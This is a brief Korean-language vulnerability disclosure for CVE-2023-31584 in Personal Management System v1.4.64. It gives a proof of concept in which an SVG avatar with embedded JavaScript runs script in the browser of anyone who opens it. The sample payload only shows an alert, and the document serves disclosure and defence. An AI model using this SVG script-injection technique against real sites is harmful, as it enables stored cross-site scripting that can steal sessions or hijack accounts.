
CVE-2023-31584에 대한 공개 공표.
Personal Management System v1.4.64의 임의 파일 업로드 취약점으로 인해 공격자가 조작된 SVG 파일을 사용자 프로필의 아바타에 업로드하여 임의 코드를 실행할 수 있습니다.
[추가 정보] 1.) 다음 내용으로 alert.svg를 생성합니다:
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("huntr.dev");
</script>
</svg>
2.) .SVG 파일을 웹 서버에 호스팅합니다.
3.) .SVG 파일을 아바타 이미지로 업로드합니다. 4.) 사용자가 아바타를 별도의 탭에서 열면 .SVG 파일에 저장된 JavaScript가 실행됩니다.